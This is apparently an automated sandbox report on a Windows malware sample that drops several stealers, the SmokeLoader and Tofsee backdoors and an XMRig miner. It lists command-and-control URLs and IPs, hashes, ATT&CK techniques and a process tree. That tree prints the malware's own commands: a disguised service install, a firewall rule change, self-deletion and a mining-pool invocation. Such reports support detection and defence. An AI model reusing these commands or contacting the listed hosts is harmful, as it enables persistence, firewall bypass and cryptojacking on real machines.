arkei | 8fe0e96079608b65906be8b65e589d44d73d1b46de789752c5ec47e79d3976c6

Analysis

max time kernel
60s
max time network
180s
platform
windows7_x64
resource
win7v20210408
submitted
25-09-2021 06:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48dd852dff677f29ee557343c11db0a8.exe
Size

287KB
MD5

48dd852dff677f29ee557343c11db0a8
SHA1

b76942602379e3aaf567f9244f2d480acba20fce
SHA256

8fe0e96079608b65906be8b65e589d44d73d1b46de789752c5ec47e79d3976c6
SHA512

e8e1222eb3237f9d2c311f2e8eb4a935da716ad1649a6b6e08887c2259ff0ad38afd20a7f2d7c7ae858ef9cfd0717641d47b8cf1a5a308f3f0ceb54ee87ac9ac

Score

10^/10

arkei raccoon redline smokeloader tofsee xmrig 5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4 700$qq vol backdoor evasion infostealer miner persistence stealer themida trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32

Extracted

Family

redline

Botnet

135.181.142.223:30397

Extracted

Family

redline

178.132.3.103:80

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes

url4cnc
https://t.me/agrybirdsgamerept

rc4.plain

Extracted

Family

redline

Botnet

700$

65.21.231.57:60751

Extracted

Family

redline

Botnet

vol

92.222.145.232:61157

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/524-93-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/524-94-0x000000000041C5CE-mapping.dmp	family_redline
behavioral1/memory/524-99-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/624-126-0x00000000020F0000-0x000000000210E000-memory.dmp	family_redline
behavioral1/memory/624-122-0x0000000001CB0000-0x0000000001CCF000-memory.dmp	family_redline
behavioral1/memory/1356-148-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1356-153-0x000000000041C5CA-mapping.dmp	family_redline
behavioral1/memory/1356-162-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1356-164-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/2044-168-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/2044-173-0x000000000041C5DA-mapping.dmp	family_redline
behavioral1/memory/2044-174-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/2044-175-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Arkei Stealer Payload 2 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\A2EB.exe	family_arkei
C:\Users\Admin\AppData\Local\Temp\A2EB.exe	family_arkei

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2160-178-0x0000000000080000-0x0000000000171000-memory.dmp	xmrig
behavioral1/memory/2160-185-0x000000000011259C-mapping.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 12 IoCs

Processes:

2200.exe2200.exe2CF9.exe3380.exe393B.exe4F1C.exe2CF9.exetayjojxl.exe81E0.exe8C0F.exe98BC.exeA2EB.exe

pid	process
2040	2200.exe
1712	2200.exe
1796	2CF9.exe
1224	3380.exe
1404	393B.exe
1072	4F1C.exe
524	2CF9.exe
1784	tayjojxl.exe
624	81E0.exe
1364	8C0F.exe
1404	98BC.exe
1704	A2EB.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4F1C.exe3380.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4F1C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4F1C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3380.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3380.exe

Deletes itself 1 IoCs

Processes:

pid process

1252
Loads dropped DLL 2 IoCs

Processes:

2200.exe2CF9.exe

pid process

2040 2200.exe
1796 2CF9.exe

pid	process
1252

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3380.exe	themida
C:\Users\Admin\AppData\Local\Temp\4F1C.exe	themida
behavioral1/memory/1072-98-0x00000000002A0000-0x00000000002A1000-memory.dmp	themida
behavioral1/memory/1224-109-0x0000000000CC0000-0x0000000000CC1000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

4F1C.exe3380.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4F1C.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3380.exe

Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

4F1C.exe3380.exe

pid process

1072 4F1C.exe
1224 3380.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

pid	process
1072	4F1C.exe
1224	3380.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

48dd852dff677f29ee557343c11db0a8.exe2200.exe2CF9.exetayjojxl.exe

description	pid	process	target process
PID 1208 set thread context of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 2040 set thread context of 1712	2040	2200.exe	2200.exe
PID 1796 set thread context of 524	1796	2CF9.exe	2CF9.exe
PID 1784 set thread context of 1808	1784	tayjojxl.exe	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

48dd852dff677f29ee557343c11db0a8.exe2200.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	48dd852dff677f29ee557343c11db0a8.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	48dd852dff677f29ee557343c11db0a8.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	48dd852dff677f29ee557343c11db0a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2200.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2200.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2200.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2408 timeout.exe

pid	process
2408	timeout.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b143d13095c0424edb47d450dd49d084297dce82e72baa49c12fdc07e721d131398fc85cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814db874f7d3be5a4644490bdb07e2cec975c06cbc4e53d428dc9741035fca6681dd4844c7d0db8f2054991cfdb2470dd926d5d8dc4bf662fd39a460b37f9942e569beb092d60b19d561cc689b37925ed935d3491abee3571bbd91d5061cda56814db874f7d3be6ae64c9d4b4845ad015fd6d34fdc48c541de4da1b4f6f92e72f52edb47d440dd49d64b20784e20814dda46d3731d68e541de4ac450437e3a16b0adc804b6a3ceca5642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad923c04cd	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

48dd852dff677f29ee557343c11db0a8.exe

pid	process
1800	48dd852dff677f29ee557343c11db0a8.exe
1800	48dd852dff677f29ee557343c11db0a8.exe
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252
1252

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

48dd852dff677f29ee557343c11db0a8.exe2200.exe

pid process

1800 48dd852dff677f29ee557343c11db0a8.exe
1712 2200.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

4F1C.exe2CF9.exe

description	pid	process
Token: SeShutdownPrivilege	1252
Token: SeShutdownPrivilege	1252
Token: SeShutdownPrivilege	1252
Token: SeShutdownPrivilege	1252
Token: SeShutdownPrivilege	1252
Token: SeDebugPrivilege	1072	4F1C.exe
Token: SeDebugPrivilege	524	2CF9.exe
Token: SeShutdownPrivilege	1252

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

pid process

1252

pid	process
1252

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

48dd852dff677f29ee557343c11db0a8.exe2200.exe2CF9.exe393B.exe

description	pid	process	target process
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1208 wrote to memory of 1800	1208	48dd852dff677f29ee557343c11db0a8.exe	48dd852dff677f29ee557343c11db0a8.exe
PID 1252 wrote to memory of 2040	1252		2200.exe
PID 1252 wrote to memory of 2040	1252		2200.exe
PID 1252 wrote to memory of 2040	1252		2200.exe
PID 1252 wrote to memory of 2040	1252		2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 2040 wrote to memory of 1712	2040	2200.exe	2200.exe
PID 1252 wrote to memory of 1796	1252		2CF9.exe
PID 1252 wrote to memory of 1796	1252		2CF9.exe
PID 1252 wrote to memory of 1796	1252		2CF9.exe
PID 1252 wrote to memory of 1796	1252		2CF9.exe
PID 1252 wrote to memory of 1224	1252		3380.exe
PID 1252 wrote to memory of 1224	1252		3380.exe
PID 1252 wrote to memory of 1224	1252		3380.exe
PID 1252 wrote to memory of 1224	1252		3380.exe
PID 1252 wrote to memory of 1404	1252		393B.exe
PID 1252 wrote to memory of 1404	1252		393B.exe
PID 1252 wrote to memory of 1404	1252		393B.exe
PID 1252 wrote to memory of 1404	1252		393B.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1404 wrote to memory of 768	1404	393B.exe	conhost.exe
PID 1404 wrote to memory of 768	1404	393B.exe	conhost.exe
PID 1404 wrote to memory of 768	1404	393B.exe	conhost.exe
PID 1404 wrote to memory of 768	1404	393B.exe	conhost.exe
PID 1252 wrote to memory of 1072	1252		4F1C.exe
PID 1252 wrote to memory of 1072	1252		4F1C.exe
PID 1252 wrote to memory of 1072	1252		4F1C.exe
PID 1252 wrote to memory of 1072	1252		4F1C.exe
PID 1404 wrote to memory of 1552	1404	393B.exe	cmd.exe
PID 1404 wrote to memory of 1552	1404	393B.exe	cmd.exe
PID 1404 wrote to memory of 1552	1404	393B.exe	cmd.exe
PID 1404 wrote to memory of 1552	1404	393B.exe	cmd.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1796 wrote to memory of 524	1796	2CF9.exe	2CF9.exe
PID 1404 wrote to memory of 1760	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1760	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1760	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1760	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1604	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1604	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1604	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1604	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1824	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1824	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1824	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1824	1404	393B.exe	sc.exe
PID 1404 wrote to memory of 1104	1404	393B.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\48dd852dff677f29ee557343c11db0a8.exe
"C:\Users\Admin\AppData\Local\Temp\48dd852dff677f29ee557343c11db0a8.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1208

C:\Users\Admin\AppData\Local\Temp\48dd852dff677f29ee557343c11db0a8.exe
"C:\Users\Admin\AppData\Local\Temp\48dd852dff677f29ee557343c11db0a8.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1800

C:\Users\Admin\AppData\Local\Temp\2200.exe
C:\Users\Admin\AppData\Local\Temp\2200.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\AppData\Local\Temp\2200.exe
C:\Users\Admin\AppData\Local\Temp\2200.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1712

C:\Users\Admin\AppData\Local\Temp\2CF9.exe
C:\Users\Admin\AppData\Local\Temp\2CF9.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1796

C:\Users\Admin\AppData\Local\Temp\2CF9.exe
C:\Users\Admin\AppData\Local\Temp\2CF9.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Users\Admin\AppData\Local\Temp\3380.exe
C:\Users\Admin\AppData\Local\Temp\3380.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1224

C:\Users\Admin\AppData\Local\Temp\393B.exe
C:\Users\Admin\AppData\Local\Temp\393B.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pqzkllxd\
2⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tayjojxl.exe" C:\Windows\SysWOW64\pqzkllxd\
2⤵
PID:1552

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create pqzkllxd binPath= "C:\Windows\SysWOW64\pqzkllxd\tayjojxl.exe /d\"C:\Users\Admin\AppData\Local\Temp\393B.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:1760

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description pqzkllxd "wifi internet conection"
2⤵
PID:1604

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start pqzkllxd
2⤵
PID:1824

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:1104

C:\Users\Admin\AppData\Local\Temp\4F1C.exe
C:\Users\Admin\AppData\Local\Temp\4F1C.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\SysWOW64\pqzkllxd\tayjojxl.exe
C:\Windows\SysWOW64\pqzkllxd\tayjojxl.exe /d"C:\Users\Admin\AppData\Local\Temp\393B.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1784

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1808

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:2160

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "229389222-17673079561715683792-145016784575682829816360217689290522341234472489"
1⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\81E0.exe
C:\Users\Admin\AppData\Local\Temp\81E0.exe
1⤵
- Executes dropped EXE
PID:624

C:\Users\Admin\AppData\Local\Temp\8C0F.exe
C:\Users\Admin\AppData\Local\Temp\8C0F.exe
1⤵
- Executes dropped EXE
PID:1364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\98BC.exe
C:\Users\Admin\AppData\Local\Temp\98BC.exe
1⤵
- Executes dropped EXE
PID:1404

C:\Users\Admin\AppData\Local\Temp\A2EB.exe
C:\Users\Admin\AppData\Local\Temp\A2EB.exe
1⤵
- Executes dropped EXE
PID:1704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A2EB.exe" & exit
2⤵
PID:2372

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
3⤵
- Delays execution with timeout.exe
PID:2408

C:\Users\Admin\AppData\Local\Temp\A617.exe
C:\Users\Admin\AppData\Local\Temp\A617.exe
1⤵
PID:1308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2200.exe
MD5
1772f2f7dd150e0a244e335f16bd6a47

SHA1
810015c53414a98e54ccc4db5853ed97f0d0afa1

SHA256
f7e22e20cd90f57ce6025dfb5bd05d49963e1915c18abcf16af7503a7215be8b

SHA512
f9cffa36af83c2a2e4830989a51f5f69bee4889a97ccf927dbcc36e63e9200cc0c9ed9544b1011f3d41f967e5f1900e8f2a99cd15300dc47683b13ebf75475cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2200.exe
MD5
1772f2f7dd150e0a244e335f16bd6a47

SHA1
810015c53414a98e54ccc4db5853ed97f0d0afa1

SHA256
f7e22e20cd90f57ce6025dfb5bd05d49963e1915c18abcf16af7503a7215be8b

SHA512
f9cffa36af83c2a2e4830989a51f5f69bee4889a97ccf927dbcc36e63e9200cc0c9ed9544b1011f3d41f967e5f1900e8f2a99cd15300dc47683b13ebf75475cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2200.exe
MD5
1772f2f7dd150e0a244e335f16bd6a47

SHA1
810015c53414a98e54ccc4db5853ed97f0d0afa1

SHA256
f7e22e20cd90f57ce6025dfb5bd05d49963e1915c18abcf16af7503a7215be8b

SHA512
f9cffa36af83c2a2e4830989a51f5f69bee4889a97ccf927dbcc36e63e9200cc0c9ed9544b1011f3d41f967e5f1900e8f2a99cd15300dc47683b13ebf75475cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CF9.exe
MD5
8df6ef1e48d3a33226c91bf4a93b0c8a

SHA1
e70ed102babe577b9481be056cb8cc0564bdc669

SHA256
5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

SHA512
d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CF9.exe
MD5
8df6ef1e48d3a33226c91bf4a93b0c8a

SHA1
e70ed102babe577b9481be056cb8cc0564bdc669

SHA256
5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

SHA512
d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\2CF9.exe
MD5
8df6ef1e48d3a33226c91bf4a93b0c8a

SHA1
e70ed102babe577b9481be056cb8cc0564bdc669

SHA256
5c08f9fc48f867d84001477316d7235e73483cc3fc6ac0f94ebd68564da016cd

SHA512
d5e021bfd927ebd9ce585bafe88970ea576f4e27752940e087a03d18568787d7442735495703cd8c02a4988e4ab13fcfc089956c9b109d250227b947b8dab1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\3380.exe
MD5
f853fe6b26dcf67545675aec618f3a99

SHA1
a70f5ffd6dac789909ccb19dfb31272a520c7bc0

SHA256
091ba447af0f0cabd66484b3f81e909ca01be4e27db9ccf42779174e04dad57a

SHA512
4764e88d5bdcf88447e0782c88fec18f5a1083b460829e16635a8602173f1a6813d3ff93866bef587f9f9b682451d4386bd765b2da580c69f7483b48f074bbd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\393B.exe
MD5
25d5d497838fd97828d3deccd8ab3dcf

SHA1
9a62b4fee040e18f55e9b05cba21fa4e8befb604

SHA256
81a5160e2ab8b3de21042416f371c9c95118c6d3f0d7f08bb1fd1158dfcba31c

SHA512
ba019bb8f104d260f67f6a897185457069b269c3796549becd8928e9e28d2654bfee42af9a6361bb77c6698df6519b37278a1368e50615618e9ff197f56e82c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\393B.exe
MD5
25d5d497838fd97828d3deccd8ab3dcf

SHA1
9a62b4fee040e18f55e9b05cba21fa4e8befb604

SHA256
81a5160e2ab8b3de21042416f371c9c95118c6d3f0d7f08bb1fd1158dfcba31c

SHA512
ba019bb8f104d260f67f6a897185457069b269c3796549becd8928e9e28d2654bfee42af9a6361bb77c6698df6519b37278a1368e50615618e9ff197f56e82c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\4F1C.exe
MD5
b034912423e70d6efb04aec0f04e6ffe

SHA1
0b8cbd448b1f86c587854366a6527c46bb5edc02

SHA256
00132fa8c558159ddc4ce3354c091e99b5eeed4d255e89a04561eece5ad8e43c

SHA512
89879dba82bed65dc4d7c6aff8771f6301f81e335ff38b3e006f92525625b186159c0349f4a0198fa2e154109af4dfa4ab959b6a53de113e2beb4787aff9754f

Download Submit
C:\Users\Admin\AppData\Local\Temp\81E0.exe
MD5
c7a74664f4ddb6997ae6ea6dac763b1d

SHA1
77eed13dfc9f45ed52343026b1705935912ebd32

SHA256
7f3a1c052e2eb53fac9791aa61c961f701e287598246a4231ac6dd670180a682

SHA512
0c2b2a701166b8b091b0d92c2aac053f73e4ff994b09712f66a8bfa754fb8d9ce55ebaa6d6e71db6de26047df56ff322808725c60b21ccbf303ae9b209409b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C0F.exe
MD5
66418c1bbdff03a57d27110d51372efc

SHA1
a60da2e4052136b89a2d1f8c8a80f5694700f9da

SHA256
f5b28d8533842deac03a82b2f72bcf1d4b72a4aad1445b53558a3b01f7ef4c90

SHA512
dcf1e46c62e4db49b069866fd0ce50cd612e13a979f4bfe5ac78ccf6ac6b91850f3fa79c644409248d08d98ff4536422d2842ce04f3061edd0c2effde8e61875

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C0F.exe
MD5
66418c1bbdff03a57d27110d51372efc

SHA1
a60da2e4052136b89a2d1f8c8a80f5694700f9da

SHA256
f5b28d8533842deac03a82b2f72bcf1d4b72a4aad1445b53558a3b01f7ef4c90

SHA512
dcf1e46c62e4db49b069866fd0ce50cd612e13a979f4bfe5ac78ccf6ac6b91850f3fa79c644409248d08d98ff4536422d2842ce04f3061edd0c2effde8e61875

Download Submit
C:\Users\Admin\AppData\Local\Temp\98BC.exe
MD5
c38dbc0116454547e36acc6c850150a8

SHA1
80d0f13e9bba9fb7365bc0858f27207ff5fca46e

SHA256
f35af24da4d47968bf775ca94a4dc8f173726473df4ca26d2183b4442889085f

SHA512
efcfc8db36a348431d44013522e579e8016e551e7bfbf7f3b595368e3b449c79b2895db0761fda96e3f09970e76b1deb574b3195b81239c353feb6da2fdc9da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\A2EB.exe
MD5
7fe4c282af08f210d4ba53018ebb1518

SHA1
a3e638758b95201e91facbbf8ef0016c1b4eaaf7

SHA256
09184983b338a537b6a3cef50b9d1e080d5c7013dad40966111a60e382d3724c

SHA512
72c76fa20f4470bf81ec98502b566acb9277f7560a1ec65aa67f98f1679c4312c1efbd0d5373c864a7ebf9e9f01b093b23924ae61c06fb3a93dff8bc999237f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\A2EB.exe
MD5
7fe4c282af08f210d4ba53018ebb1518

SHA1
a3e638758b95201e91facbbf8ef0016c1b4eaaf7

SHA256
09184983b338a537b6a3cef50b9d1e080d5c7013dad40966111a60e382d3724c

SHA512
72c76fa20f4470bf81ec98502b566acb9277f7560a1ec65aa67f98f1679c4312c1efbd0d5373c864a7ebf9e9f01b093b23924ae61c06fb3a93dff8bc999237f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\A617.exe
MD5
1eb0e1c2fff43c16396cccc4b836be85

SHA1
09d12894b19c88ed3eb0c0a7a9648ba5198fe573

SHA256
d02e48dca2aa14a26876405871fa4788a4dba35e0151f6aee21c900673426474

SHA512
fe2358b6dcf96df03fb0bc16055de48f321c1a8f031073a8cd521297e571dfafd9cb06912fa9c31dad248f4135bde3993f33924752bff31ffc62e1b2ba3600bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\A617.exe
MD5
1eb0e1c2fff43c16396cccc4b836be85

SHA1
09d12894b19c88ed3eb0c0a7a9648ba5198fe573

SHA256
d02e48dca2aa14a26876405871fa4788a4dba35e0151f6aee21c900673426474

SHA512
fe2358b6dcf96df03fb0bc16055de48f321c1a8f031073a8cd521297e571dfafd9cb06912fa9c31dad248f4135bde3993f33924752bff31ffc62e1b2ba3600bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\tayjojxl.exe
MD5
5542ac373556eea886a08106e8f90147

SHA1
c10e9d1314778cec93d70390197446eb7bf17132

SHA256
f8ff90a266abebf1da71e183b29fd809c2ecd55099b65c9154f45d93463ce686

SHA512
